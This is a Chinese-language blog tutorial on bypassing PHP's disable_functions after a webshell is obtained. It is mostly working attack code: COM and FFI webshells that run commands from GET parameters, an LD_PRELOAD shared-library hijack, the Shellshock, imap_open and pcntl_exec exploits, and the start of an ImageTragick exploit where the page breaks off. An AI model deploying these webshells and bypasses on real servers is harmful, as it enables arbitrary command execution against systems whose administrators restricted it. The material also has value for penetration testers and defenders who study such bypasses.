

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;dark&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/kd.png">
  <link rel="icon" href="/img/kd.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>浅析Bypass disable_functions - SD</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"sd-xd.github.io","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>blog of SD</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="浅析Bypass disable_functions">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-08-05 19:47" pubdate>
        2021年8月5日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.7k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      49
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">浅析Bypass disable_functions</h1>
            
            <div class="markdown-body">
              <h2 id="disable-functions"><a href="#disable-functions" class="headerlink" title="disable_functions"></a>disable_functions</h2><p>disable_functions是php.ini中的一个设置选项，可以用来设置PHP环境禁止使用某些函数，通常是网站管理员为了安全起见，用来禁用某些危险的命令执行函数等。</p>
<p><img src="/img/bypass_disable_function/1.png" srcset="/img/loading.gif" lazyload></p>
<p>比如拿到一个webshell,用管理工具去连接,执行命令发现<code>ret=127</code>,实际上就是因为被这个限制的原因</p>
<p><img src="/img/bypass_disable_function/2.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="黑名单"><a href="#黑名单" class="headerlink" title="黑名单"></a>黑名单</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open<br></code></pre></td></tr></table></figure>
<p>观察php.ini 中的 disable_function 漏过了哪些函数，若存在漏网之鱼，直接利用即可。</p>
<h2 id="利用Windows组件COM绕过"><a href="#利用Windows组件COM绕过" class="headerlink" title="利用Windows组件COM绕过"></a>利用Windows组件COM绕过</h2><p>查看<code>com.allow_dcom</code>是否开启,这个默认是不开启的。<br><img src="/img/bypass_disable_function/3.png" srcset="/img/loading.gif" lazyload></p>
<p>创建一个COM对象,通过调用COM对象的<code>exec</code>替我们执行命令</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$wsh</span> = <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;wsh&#x27;</span>]) ? <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;wsh&#x27;</span>] : <span class="hljs-string">&#x27;wscript&#x27;</span>;<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$wsh</span> == <span class="hljs-string">&#x27;wscript&#x27;</span>) &#123;<br>    <span class="hljs-variable">$command</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>];<br>    <span class="hljs-variable">$wshit</span> = <span class="hljs-keyword">new</span> COM(<span class="hljs-string">&#x27;WScript.shell&#x27;</span>) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;Create Wscript.Shell Failed!&quot;</span>);<br>    <span class="hljs-variable">$exec</span> = <span class="hljs-variable">$wshit</span>-&gt;exec(<span class="hljs-string">&quot;cmd /c&quot;</span>.<span class="hljs-variable">$command</span>);<br>    <span class="hljs-variable">$stdout</span> = <span class="hljs-variable">$exec</span>-&gt;StdOut();<br>    <span class="hljs-variable">$stroutput</span> = <span class="hljs-variable">$stdout</span>-&gt;ReadAll();<br>    <span class="hljs-keyword">echo</span> <span class="hljs-variable">$stroutput</span>;<br>&#125;<br><span class="hljs-keyword">elseif</span>(<span class="hljs-variable">$wsh</span> == <span class="hljs-string">&#x27;application&#x27;</span>) &#123;<br>    <span class="hljs-variable">$command</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>];<br>    <span class="hljs-variable">$wshit</span> = <span class="hljs-keyword">new</span> COM(<span class="hljs-string">&quot;Shell.Application&quot;</span>) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;Shell.Application Failed!&quot;</span>);<br>    <span class="hljs-variable">$exec</span> = <span class="hljs-variable">$wshit</span>-&gt;ShellExecute(<span class="hljs-string">&quot;cmd&quot;</span>,<span class="hljs-string">&quot;/c &quot;</span>.<span class="hljs-variable">$command</span>);<br>&#125; <br><span class="hljs-keyword">else</span> &#123;<br>  <span class="hljs-keyword">echo</span>(<span class="hljs-number">0</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p><img src="/img/bypass_disable_function/4.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="利用Linux环境变量LD-PRELOAD"><a href="#利用Linux环境变量LD-PRELOAD" class="headerlink" title="利用Linux环境变量LD_PRELOAD"></a>利用Linux环境变量LD_PRELOAD</h2><h3 id="初阶"><a href="#初阶" class="headerlink" title="初阶"></a>初阶</h3><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">LD_PRELOAD是linux系统的一个环境变量，它可以影响程序的运行时的链接，它允许你定义在程序运行前优先加载的动态链接库。<br></code></pre></td></tr></table></figure>
<p>总的来说就是=<code>LD_PRELOAD</code>指定的动态链接库文件，会在其它文件调用之前先被调用，借此可以达到劫持的效果。</p>
<p>思路为:</p>
<ol>
<li>创建一个.so文件,linux的动态链接库文件</li>
<li>使用putenv函数将<code>LD_PRELOAD</code>路径设置为我们自己创建的动态链接库文件</li>
<li>利用某个函数去触发该动态链接库</li>
</ol>
<p>这里以<code>mail()</code>函数举例。<br>在底层c语言中,<code>mail.c</code>中会调用<code>sendmail</code>，而sendmail_path使从ini文件中说明</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs csharp">; For Unix only.  <span class="hljs-function">You may supply arguments <span class="hljs-keyword">as</span> <span class="hljs-title">well</span> (<span class="hljs-params"><span class="hljs-literal">default</span>: <span class="hljs-string">&quot;sendmail -t -i&quot;</span></span>).</span> <br>;sendmail_path =<br></code></pre></td></tr></table></figure>
<p>默认为”sendmail -t -i”<br><img src="/img/bypass_disable_function/8.png" srcset="/img/loading.gif" lazyload></p>
<p>但是sendmail并不是默认安装的,需要自己下载</p>
<p>使用命令<code>readelf -Ws /usr/sbin/sendmail</code>可以看到sendmail调用了哪些库函数,这里选择<code>geteuid</code></p>
<p><img src="/img/bypass_disable_function/5.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/bypass_disable_function/6.png" srcset="/img/loading.gif" lazyload></p>
<p>创建一个<code>test.c</code>文件,并定义一个<code>geteuid</code>函数,目的是劫持该函数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">#include &lt;stdlib.h&gt;</span><br><span class="hljs-comment">#include &lt;stdio.h&gt;</span><br><span class="hljs-comment">#include &lt;string.h&gt;</span><br><span class="hljs-keyword">void</span> payload() &#123;<br>    system(<span class="hljs-string">&quot;whoami &gt; /var/tmp/sd.txt&quot;</span>);<br>&#125;<br><span class="hljs-keyword">int</span> geteuid()<br>&#123;<br>    <span class="hljs-keyword">if</span> (getenv(<span class="hljs-string">&quot;LD_PRELOAD&quot;</span>) == <span class="hljs-literal">NULL</span>) &#123; <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>; &#125;<br>    unsetenv(<span class="hljs-string">&quot;LD_PRELOAD&quot;</span>);<br>    payload();<br>&#125;<br></code></pre></td></tr></table></figure>

<p>使用gcc编译为.so文件</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs powershell">gcc <span class="hljs-literal">-c</span> <span class="hljs-literal">-fPIC</span> test.c <span class="hljs-literal">-o</span> test<br>gcc <span class="hljs-literal">-shared</span> test <span class="hljs-literal">-o</span> test.so<br></code></pre></td></tr></table></figure>
<p>这里有个坑:不要在windows上编译,编译出来是MZ头,不是ELF。</p>
<p>然后再上传test.so到指定目录下。</p>
<p>最后创建<code>shell.php</code>文件,上传到网站目录下,这里.so文件路径要写对。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>putenv(<span class="hljs-string">&quot;LD_PRELOAD=/var/www/test.so&quot;</span>);<br>mail(<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-string">&quot;&quot;</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>再理一下整个过程:当我们访问shell.php文件的时候,先会将<code>LD_PRELOAD</code>路径设置为恶意的.so文件，然后触发mail()函数,mail函数会调用sendmail函数,sendmail函数会调用库函数geteuid,而库函数geteuid已经被优先加载,这时执行geteuid就是执行的我们自己定义的函数,并执行payload(),也就是代码中的<code>whoami</code>命令写入到sd.txt中。</p>
<p>由于拿到的webshell很有可能是<code>www-data</code>这种普通权限。<br>整个过程要注意权限问题,要可写的目录下。<br><img src="/img/bypass_disable_function/7.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/bypass_disable_function/9.png" srcset="/img/loading.gif" lazyload></p>
<p>web访问页面没有文件写出,可以看看定义的目录是否有权限。</p>
<h3 id="进阶版"><a href="#进阶版" class="headerlink" title="进阶版"></a>进阶版</h3><p>在整个流程中,唯一担心的是sendmail没有安装怎么办,它可不是默认安装的,而拿到的webshell权限一般也不高,无法自行安装,也不能改php.ini。</p>
<p>而有前辈早已指出:<a target="_blank" rel="noopener" href="https://www.freebuf.com/web/192052.html">无需sendmail：巧用LD_PRELOAD突破disable_functions</a><br>细节已经说的非常明白,这里只复现,在此不再画蛇添足。</p>
<p>去github下载三个重要文件:<br>bypass_disablefunc.php,bypass_disablefunc_x64.so或bypass_disablefunc_x86.so,bypass_disablefunc.c<br>将 bypass_disablefunc.php 和 bypass_disablefunc_x64.so传到目标有权限的目录中。<br>这里很有可能无法直接上传到web目录,解决办法就是上传到有权限的目录下,并用include去包含。<br><img src="/img/bypass_disable_function/10.png" srcset="/img/loading.gif" lazyload></p>
<p>这里我已经卸载了sendmail文件<br><img src="/img/bypass_disable_function/11.png" srcset="/img/loading.gif" lazyload></p>
<p>注意区分post和get<br><img src="/img/bypass_disable_function/12.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="利用PHP7-4-FFI绕过"><a href="#利用PHP7-4-FFI绕过" class="headerlink" title="利用PHP7.4 FFI绕过"></a>利用PHP7.4 FFI绕过</h2><p>FFI（Foreign Function Interface），即外部函数接口，允许从用户区调用C代码。简单地说，就是一项让你在PHP里能够调用C代码的技术。<br>当PHP所有的命令执行函数被禁用后，通过PHP 7.4的新特性FFI可以实现用PHP代码调用C代码的方式，先声明C中的命令执行函数，然后再通过FFI变量调用该C函数即可Bypass disable_functions。<br>具体请参考<a target="_blank" rel="noopener" href="https://www.php.net/manual/en/book.ffi.php">Foreign Function Interface</a></p>
<p>当前php版本为7.4.3<br><img src="/img/bypass_disable_function/14.png" srcset="/img/loading.gif" lazyload></p>
<p>先看FFI是否开启,并且ffi.enable需要设置为true<br><img src="/img/bypass_disable_function/13.png" srcset="/img/loading.gif" lazyload></p>
<p>使用FFI::cdef创建一个新的FFI对象<br><img src="/img/bypass_disable_function/15.png" srcset="/img/loading.gif" lazyload></p>
<p>通过c语言的system去执行,绕过disable functions。<br>将返回结果写入/tmp/SD，并在每次读出结果后用unlink()函数删除它。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$cmd</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>];<br><span class="hljs-variable">$ffi</span> = FFI::cdef(<span class="hljs-string">&quot;int system(const char *command);&quot;</span>);<br><span class="hljs-variable">$ffi</span>-&gt;system(<span class="hljs-string">&quot;<span class="hljs-subst">$cmd</span> &gt; /tmp/SD&quot;</span>);       <span class="hljs-comment">//由GET传参的任意代码执行</span><br><span class="hljs-keyword">echo</span> file_get_contents(<span class="hljs-string">&quot;/tmp/SD&quot;</span>);<br>@unlink(<span class="hljs-string">&quot;/tmp/SD&quot;</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/bypass_disable_function/16.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="利用Bash-Shellshock-CVE-2014-6271-破壳漏洞"><a href="#利用Bash-Shellshock-CVE-2014-6271-破壳漏洞" class="headerlink" title="利用Bash Shellshock(CVE-2014-6271)破壳漏洞"></a>利用Bash Shellshock(CVE-2014-6271)破壳漏洞</h2><p>利用条件php &lt; 5.6.2 &amp; bash &lt;= 4.3（破壳）</p>
<p>Bash使用的环境变量是通过函数名称来调用的，导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后，Bash执行并未退出，而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界，也没有做出合法化的参数判断。</p>
<p>简单测试是否存在破壳漏洞:<br>命令行输入<code> env x=&#39;() &#123; :;&#125;; echo vulnerable&#39; bash -c &quot;echo this is a test&quot;</code><br>如果输出了<code>vulnerable</code>，则说明存在bash破壳漏洞<br><img src="/img/bypass_disable_function/18.png" srcset="/img/loading.gif" lazyload></p>
<p><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/35146">EXP</a>如下:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-comment"># Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) </span><br><span class="hljs-comment"># Google Dork: none </span><br><span class="hljs-comment"># Date: 10/31/2014 </span><br><span class="hljs-comment"># Exploit Author: Ryan King (Starfall) </span><br><span class="hljs-comment"># Vendor Homepage: http://php.net </span><br><span class="hljs-comment"># Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror </span><br><span class="hljs-comment"># Version: 5.* (tested on 5.6.2) </span><br><span class="hljs-comment"># Tested on: Debian 7 and CentOS 5 and 6 </span><br><span class="hljs-comment"># CVE: CVE-2014-6271 </span><br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">shellshock</span>(<span class="hljs-params"><span class="hljs-variable">$cmd</span></span>) </span>&#123; <span class="hljs-comment">// Execute a command via CVE-2014-6271 @mail.c:283 </span><br>   <span class="hljs-variable">$tmp</span> = tempnam(<span class="hljs-string">&quot;.&quot;</span>,<span class="hljs-string">&quot;data&quot;</span>); <br>   putenv(<span class="hljs-string">&quot;PHP_LOL=() &#123; x; &#125;; <span class="hljs-subst">$cmd</span> &gt;<span class="hljs-subst">$tmp</span> 2&gt;&amp;1&quot;</span>); <br>   <span class="hljs-comment">// In Safe Mode, the user may only alter environment variableswhose names </span><br>   <span class="hljs-comment">// begin with the prefixes supplied by this directive. </span><br>   <span class="hljs-comment">// By default, users will only be able to set environment variablesthat </span><br>   <span class="hljs-comment">// begin with PHP_ (e.g. PHP_FOO=BAR). <span class="hljs-doctag">Note:</span> if this directive isempty, </span><br>   <span class="hljs-comment">// PHP will let the user modify ANY environment variable! </span><br>   <span class="hljs-comment">//mail(&quot;a@127.0.0.1&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;-bv&quot;); // -bv so we don&#x27;t actuallysend any mail </span><br>   error_log(<span class="hljs-string">&#x27;a&#x27;</span>,<span class="hljs-number">1</span>);<br>   <span class="hljs-variable">$output</span> = @file_get_contents(<span class="hljs-variable">$tmp</span>); <br>   @unlink(<span class="hljs-variable">$tmp</span>); <br>   <span class="hljs-keyword">if</span>(<span class="hljs-variable">$output</span> != <span class="hljs-string">&quot;&quot;</span>) <span class="hljs-keyword">return</span> <span class="hljs-variable">$output</span>; <br>   <span class="hljs-keyword">else</span> <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;No output, or not vuln.&quot;</span>; <br>&#125; <br><span class="hljs-keyword">echo</span> shellshock(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&quot;cmd&quot;</span>]); <br><span class="hljs-meta">?&gt;</span>     <br></code></pre></td></tr></table></figure>
<p>选择可上传目录路径,上传exp<br><img src="/img/bypass_disable_function/24.png" srcset="/img/loading.gif" lazyload></p>
<p>包含文件执行<br><img src="/img/bypass_disable_function/25.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="利用imap-open-绕过"><a href="#利用imap-open-绕过" class="headerlink" title="利用imap_open()绕过"></a>利用imap_open()绕过</h2><p>利用条件需要安装iamp扩展,命令行输入:<code>apt-get install php-imap</code><br>在php.ini中开启imap.enable_insecure_rsh选项为On；重启服务。</p>
<p><img src="/img/bypass_disable_function/17.png" srcset="/img/loading.gif" lazyload></p>
<p>基本原理为:</p>
<figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gauss">PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功能并且rsh命令是ssh命令的符号链接，则攻击者可以通过向目标系统发送包含-oProxyCommand参数的恶意IMAP服务器名称来利用此漏洞。成功的攻击可能允许攻击者绕过其他禁用的<span class="hljs-built_in">exec</span> 受影响软件中的功能，攻击者可利用这些功能在目标系统上执行任意<span class="hljs-built_in">shell</span>命令。<br></code></pre></td></tr></table></figure>

<p>EXP:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br>error_reporting(<span class="hljs-number">0</span>); <br><span class="hljs-keyword">if</span> (!function_exists(<span class="hljs-string">&#x27;imap_open&#x27;</span>)) &#123; <br><span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;no imap_open function!&quot;</span>); <br>&#125; <br><span class="hljs-variable">$server</span> = <span class="hljs-string">&quot;x -oProxyCommand=echot&quot;</span> . base64_encode(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>] .<br><span class="hljs-string">&quot;&gt;/tmp/cmd_result&quot;</span>) . <span class="hljs-string">&quot;|base64t-d|sh&#125;&quot;</span>; <br><span class="hljs-comment">//$server = &#x27;x -oProxyCommand=echo$IFS$()&#x27; . base64_encode($_GET[&#x27;cmd&#x27;] .</span><br><span class="hljs-string">&quot;&gt;/tmp/cmd_result&quot;</span>) . <span class="hljs-string">&#x27;|base64$IFS$()-d|sh&#125;&#x27;</span>; <br>imap_open(<span class="hljs-string">&#x27;&#123;&#x27;</span> . <span class="hljs-variable">$server</span> . <span class="hljs-string">&#x27;:143/imap&#125;INBOX&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>); <span class="hljs-comment">// or</span><br>var_dump(<span class="hljs-string">&quot;nnError: &quot;</span>.imap_last_error()); <br>sleep(<span class="hljs-number">5</span>); <br><span class="hljs-keyword">echo</span> file_get_contents(<span class="hljs-string">&quot;/tmp/cmd_result&quot;</span>); <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<h2 id="利用Pcntl组件"><a href="#利用Pcntl组件" class="headerlink" title="利用Pcntl组件"></a>利用Pcntl组件</h2><p>如果目标机器安装并启用了php组件Pcntl,就可以使用pcntl_exec()这个pcntl插件专有的命令执行函数来执行系统命令,也算是过黑名单的一钟,比较简单。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/exp/pcntl_exec/exp.php">exp</a>为:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">#pcntl_exec().php</span><br><span class="hljs-meta">&lt;?php</span> pcntl_exec(<span class="hljs-string">&quot;/bin/bash&quot;</span>, <span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;/tmp/b4dboy.sh&quot;</span>));<span class="hljs-meta">?&gt;</span><br><span class="hljs-comment">#/tmp/b4dboy.sh</span><br><span class="hljs-comment">#!/bin/bash</span><br>ls -l /<br></code></pre></td></tr></table></figure>

<h2 id="利用ImageMagick-漏洞绕过-CVE-2016–3714"><a href="#利用ImageMagick-漏洞绕过-CVE-2016–3714" class="headerlink" title="利用ImageMagick 漏洞绕过(CVE-2016–3714)"></a>利用ImageMagick 漏洞绕过(CVE-2016–3714)</h2><p>利用条件:</p>
<ul>
<li>目标主机安装了漏洞版本的imagemagick（&lt;= 3.3.0）</li>
<li>安装了php-imagick拓展并在php.ini中启用；</li>
<li>编写php通过new Imagick对象的方式来处理图片等格式文件；</li>
<li>PHP &gt;= 5.4</li>
</ul>
<h3 id="ImageMagick介绍"><a href="#ImageMagick介绍" class="headerlink" title="ImageMagick介绍"></a>ImageMagick介绍</h3><p>ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、 PNG、PDF以及PhotoCD等格式。众多的网站平台都是用他渲染处理图片。可惜在3号时被公开了一些列漏洞,其中一个漏洞可导致远程执行代码(RCE),如果你处理用户提交的图片。该漏洞是针对在野外使用此漏洞。许多图像处理插件依赖于ImageMagick库,包括但不限于PHP的imagick,Ruby的rmagick和paperclip,以及NodeJS的ImageMagick等。</p>
<p>产生原因是因为字符过滤不严谨所导致的执行代码. 对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。</p>
<p>据ImageMagick官方，目前程序存在一处远程命令执行漏洞（CVE-2016-3714），当其处理的上传图片带有攻击代码时，可远程实现远程命令执行，进而可能控制服务器，此漏洞被命名为ImageTragick。<br><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/39766">EXP</a>如下:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Disable Functions: &quot;</span> . ini_get(<span class="hljs-string">&#x27;disable_functions&#x27;</span>) . <span class="hljs-string">&quot;\n&quot;</span>;<br><br><span class="hljs-variable">$command</span> = PHP_SAPI == <span class="hljs-string">&#x27;cli&#x27;</span> ? <span class="hljs-variable">$argv</span>[<span class="hljs-number">1</span>] : <span class="hljs-variable">$_GET</span>[<span 